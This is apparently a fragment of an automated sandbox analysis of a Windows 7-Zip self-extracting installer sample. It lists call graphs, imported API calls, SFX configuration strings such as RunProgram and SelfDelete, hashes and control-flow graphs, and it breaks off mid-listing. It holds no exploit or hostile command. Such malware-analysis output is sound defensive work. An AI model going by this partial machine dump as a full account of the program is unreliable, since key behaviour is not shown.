8065->8068 8065->8069 8067->8062 8068->8064 8069->8064 8070 4020c1 8070->8061 8085 40661a 8071->8085 8074 40774e 8089 4073d1 8074->8089 8075 40773c IsBadReadPtr 8075->8074 8079 401f51 GetUserDefaultUILanguage 8078->8079 8080 401f95 8078->8080 8081 401f72 GetSystemDefaultUILanguage 8079->8081 8082 401f6e 8079->8082 8080->8070 8081->8080 8083 401f7e GetSystemDefaultLCID 8081->8083 8082->8070 8083->8080 8084 401f8e 8083->8084 8084->8080 8086 406643 8085->8086 8087 40666f IsWindow 8085->8087 8086->8087 8088 40664b GetSystemMetrics GetSystemMetrics 8086->8088 8087->8074 8087->8075 8088->8087 8090 407444 8089->8090 8091 4073e0 8089->8091 8090->8050 8091->8090 8101 4024fc 8091->8101 8093 4073f1 8094 4024fc 2 API calls 8093->8094 8095 4073fc 8094->8095 8105 403b7f 8095->8105 8098 403b7f 19 API calls 8099 40740e ??3@YAXPAX ??3@YAXPAX 8098->8099 8099->8090 8102 402513 8101->8102 8114 40112b 8102->8114 8104 40251e 8104->8093 8178 403880 8105->8178 8107 403b59 8119 40393b 8107->8119 8109 403b69 8142 4039f6 8109->8142 8111 403b74 8165 4027c7 8111->8165 8115 401177 8114->8115 8116 401139 ??2@YAPAXI 8114->8116 8115->8104 8116->8115 8118 40115a 8116->8118 8117 40116f ??3@YAXPAX 8117->8115 8118->8117 8118->8118 8201 401411 8119->8201 8123 403954 8208 40254d 8123->8208 8125 403961 8126 4024fc 2 API calls 8125->8126 8127 40396e 8126->8127 8212 403805 8127->8212 8130 401362 2 API calls 8131 403992 8130->8131 8132 40254d 2 API calls 8131->8132 8133 40399f 8132->8133 8134 4024fc 2 API calls 8133->8134 8135 4039ac 8134->8135 8136 403805 3 API calls 8135->8136 8137 4039bc ??3@YAXPAX 8136->8137 8138 4024fc 2 API calls 8137->8138 8139 4039d3 8138->8139 8140 403805 3 API calls 8139->8140 8141 4039e2 ??3@YAXPAX ??3@YAXPAX 8140->8141 8141->8109 8143 401411 2 API calls 8142->8143 8144 403a04 8143->8144 8145 401362 2 API calls 8144->8145 8146 403a0f 8145->8146 8147 40254d 2 API calls 8146->8147 8148 403a1c 8147->8148 8149 4024fc 2 API calls 8148->8149 8150 403a29 8149->8150 8151 403805 3 API calls 8150->8151 8152 403a39 ??3@YAXPAX 8151->8152 8153 401362 2 API calls 8152->8153 8154 403a4d 8153->8154 8155 40254d 2 API calls 8154->8155 8156 403a5a 8155->8156 8157 4024fc 2 API calls 8156->8157 8158 403a67 8157->8158 8159 403805 3 API calls 8158->8159 8160 403a77 ??3@YAXPAX 8159->8160 8161 4024fc 2 API calls 8160->8161 8162 403a8e 8161->8162 8163 403805 3 API calls 8162->8163 8164 403a9d ??3@YAXPAX ??3@YAXPAX 8163->8164 8164->8111 8166 401411 2 API calls 8165->8166 8167 4027d5 8166->8167 8168 4027e5 ExpandEnvironmentStringsW 8167->8168 8171 40112b 2 API calls 8167->8171 8169 402809 8168->8169 8170 4027fe ??3@YAXPAX 8168->8170 8237 402535 8169->8237 8172 402840 8170->8172 8171->8168 8172->8098 8175 402824 8176 401362 2 API calls 8175->8176 8177 402838 ??3@YAXPAX 8176->8177 8177->8172 8179 401411 2 API calls 8178->8179 8180 40388e 8179->8180 8181 401362 2 API calls 8180->8181 8182 403899 8181->8182 8183 40254d 2 API calls 8182->8183 8184 4038a6 8183->8184 8185 4024fc 2 API calls 8184->8185 8186 4038b3 8185->8186 8187 403805 3 API calls 8186->8187 8188 4038c3 ??3@YAXPAX 8187->8188 8189 401362 2 API calls 8188->8189 8190 4038d7 8189->8190 8191 40254d 2 API calls 8190->8191 8192 4038e4 8191->8192 8193 4024fc 2 API calls 8192->8193 8194 4038f1 8193->8194 8195 403805 3 API calls 8194->8195 8196 403901 ??3@YAXPAX 8195->8196 8197 4024fc 2 API calls 8196->8197 8198 403918 8197->8198 8199 403805 3 API calls 8198->8199 8200 403927 ??3@YAXPAX ??3@YAXPAX 8199->8200 8200->8107 8202 40112b 2 API calls 8201->8202 8203 401425 8202->8203 8204 401362 8203->8204 8205 40136e 8204->8205 8207 401380 8204->8207 8206 40112b 2 API calls 8205->8206 8206->8207 8207->8123 8209 40255a 8208->8209 8217 401398 8209->8217 8211 402565 8211->8125 8213 40381b 8212->8213 8214 403817 ??3@YAXPAX 8212->8214 8213->8214 8221 4026b1 8213->8221 8225 402f96 8213->8225 8214->8130 8218 4013dc 8217->8218 8219 4013ac 8217->8219 8218->8211 8220 40112b 2 API calls 8219->8220 8220->8218 8222 4026c7 8221->8222 8223 4026db 8222->8223 8229 402346 memmove 8222->8229 8223->8213 8226 402fa5 8225->8226 8228 402fbe 8226->8228 8230 4026e6 8226->8230 8228->8213 8229->8223 8231 4026f6 8230->8231 8232 401398 2 API calls 8231->8232 8233 402702 8232->8233 8236 402346 memmove 8233->8236 8235 40270f 8235->8228 8236->8235 8238 402541 8237->8238 8239 402547 ExpandEnvironmentStringsW 8237->8239 8240 40112b 2 API calls 8238->8240 8239->8175 8240->8239 11204 40e4f9 11205 40e516 11204->11205 11206 40e506 11204->11206 11209 40de46 11206->11209 11212 401b1f VirtualFree 11209->11212 11211 40de81 ??3@YAXPAX 11211->11205 11212->11211 9087 411388 ??2@YAPAXI 9088 411397 9087->9088
                                              APIs
                                                • Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                                • Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                                • Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                                • Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                                • Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
                                                • Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                                • Part of subcall function 00401B37: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                              • GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
                                              • GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C
                                                • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                                • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                                • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
                                                • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD
                                              • _wtol.MSVCRT ref: 0040509F
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004050F1
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405102
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040510A
                                              • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
                                              • _wtol.MSVCRT ref: 00405217
                                              • ??2@YAPAXI@Z.MSVCRT(00000010,004177C4,004177C4,?,00000000), ref: 0040538F
                                                • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                • Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC
                                                • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                • Part of subcall function 00402844: memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405453
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040545B
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405463
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054DD
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054E5
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054ED
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405509
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405511
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405519
                                                • Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405559
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405561
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405569
                                                • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
                                                • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
                                                • Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6
                                              • wsprintfW.USER32 ref: 00405595
                                              • _wtol.MSVCRT ref: 004057DE
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040587B
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00405883
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040588B
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0000003D,00000000,00000000,?,?,00000000,?), ref: 00405913
                                              • ??3@YAXPAX@Z.MSVCRT(?,0000003D,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4), ref: 00405938
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059AA
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059B2
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059BA
                                              • CoInitialize.OLE32(00000000), ref: 004059E9
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405A30
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405A38
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405A40
                                              • GetKeyState.USER32(00000010), ref: 00405AA1
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405BCD
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BDB
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BE3
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C16
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C1E
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C26
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C2E
                                              • memset.MSVCRT ref: 004060AE
                                              • ShellExecuteExW.SHELL32(?), ref: 0040617E
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
                                              • CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004061D4
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004061DC
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 004061E4
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 004061EA
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 004061FD
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00406205
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406222
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040622A
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406232
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040623A
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406242
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 0040624A
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 00406252
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 0040626E
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00406276
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BEB
                                                • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405C4A
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405C52
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C5A
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C62
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C94
                                              • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405CD4
                                              • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D41
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D49
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D51
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D59
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E20
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E28
                                              • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405EEC
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00405EF4
                                              • _wtol.MSVCRT ref: 00405F65
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?,?,?,?), ref: 00406294
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?,?,?,?), ref: 0040629C
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?,?,?,?), ref: 004062A4
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062AA
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062B2
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062BA
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062C2
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062CA
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062D2
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004062F1
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004062F9
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 00406301
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 00406307
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040636D
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 004063E6
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040643D
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?), ref: 00406445
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?), ref: 0040644D
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406455
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040646A
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040647B
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406483
                                              • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerlstrcpymemcmpwsprintf$AttributesCallbackCloseCommandCreateCurrentDirectoryDispatchDispatcherErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateUserVersionWaitWindow_wcsnicmpmemmovememsetwvsprintf
                                              • String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA
                                              • API String ID: 154539431-3058303289
                                              • Opcode ID: cabb4e2e52945036c720e1880f7d789d9992fedd99c9f327f88584105f760328
                                              • Instruction ID: bd55e9a5e2f2b8c77b34d16bce6880ff8bafa7c96c93ceffa7f521d25999041e
                                              • Opcode Fuzzy Hash: cabb4e2e52945036c720e1880f7d789d9992fedd99c9f327f88584105f760328
                                              • Instruction Fuzzy Hash: 65C2E231904619AADF21AF61DC45AEF3769EF00708F54403BF906B61E2EB7C9981CB5D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 651 401626-401636 652 401642-40166d call 40874d call 40a62f 651->652 653 401638-40163d 651->653 658 401680-40168c call 401411 652->658 659 40166f 652->659 654 401980-401983 653->654 665 401962-40197d ??3@YAXPAX@Z call 40eca9 658->665 666 401692-401697 658->666 660 401671-40167b call 40eca9 659->660 667 40197f 660->667 665->667 666->665 668 40169d-4016d3 call 401329 call 401454 call 401362 ??3@YAXPAX@Z 666->668 667->654 678 401948-40194b 668->678 679 4016d9-4016f8 668->679 680 40194d-401960 ??3@YAXPAX@Z call 40eca9 678->680 683 401713-401717 679->683 684 4016fa-40170e call 40eca9 ??3@YAXPAX@Z 679->684 680->667 687 401719-40171c 683->687 688 40171e-401723 683->688 684->660 690 40174b-401762 687->690 691 401745-401748 688->691 692 401725 688->692 690->684 695 401764-401787 690->695 691->690 693 401727-40172d 692->693 697 40172f-401740 call 40eca9 ??3@YAXPAX@Z 693->697 700 4017a2-4017a8 695->700 701 401789-40179d call 40eca9 ??3@YAXPAX@Z 695->701 697->660 704 4017c4-4017d6 GetLocalTime SystemTimeToFileTime 700->704 705 4017aa-4017ad 700->705 701->660 709 4017dc-4017df 704->709 707 4017b6-4017c2 705->707 708 4017af-4017b1 705->708 707->709 708->693 710 4017e1-4017e3 call 403354 709->710 711 4017f8-4017ff call 40301a 709->711 714 4017e8-4017eb 710->714 715 401804-401809 711->715 714->697 716 4017f1-4017f3 714->716 717 401934-401943 GetLastError 715->717 718 40180f-401812 715->718 716->693 717->678 719 401818-401822 ??2@YAPAXI@Z 718->719 720 40192a-40192d 718->720 722 401833 719->722 723 401824-401831 719->723 720->717 724 401835-401859 call 4010e2 call 40db53 722->724 723->724 729 40190f-401928 call 408726 call 40eca9 724->729 730 40185f-40187d GetLastError call 4012f7 call 402d5a 724->730 729->680 739 4018ba-4018cf call 403354 730->739 740 40187f-401886 730->740 746 4018d1-4018d9 739->746 747 4018db-4018f3 call 40db53 739->747 742 40188a-40189a ??3@YAXPAX@Z 740->742 744 4018a2-4018b5 call 40eca9 ??3@YAXPAX@Z 742->744 745 40189c-40189e 742->745 744->660 745->744 746->742 753 4018f5-401904 GetLastError 747->753 754 401906-40190e ??3@YAXPAX@Z 747->754 753->742 754->729
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
                                              • Instruction ID: 8ae67fe93764504dd4472983a8ee98937692ca3eac7777145cc28303e79798ac
                                              • Opcode Fuzzy Hash: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
                                              • Instruction Fuzzy Hash: 8DB17C71900205EFCB14EFA5D8849AEB7B5FF44304B24842BF512BB2F1EB39A945CB58

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1082 40301a-403031 GetFileAttributesW 1083 403033-403035 1082->1083 1084 403037-403039 1082->1084 1085 403090-403092 1083->1085 1086 403048-40304f 1084->1086 1087 40303b-403046 SetLastError 1084->1087 1088 403051-403058 call 402fed 1086->1088 1089 40305a-40305d 1086->1089 1087->1085 1088->1085 1091 40308d-40308f 1089->1091 1092 40305f-403070 FindFirstFileW 1089->1092 1091->1085 1092->1088 1094 403072-40308b FindClose CompareFileTime 1092->1094 1094->1088 1094->1091
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
                                              • SetLastError.KERNEL32(00000010), ref: 0040303D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
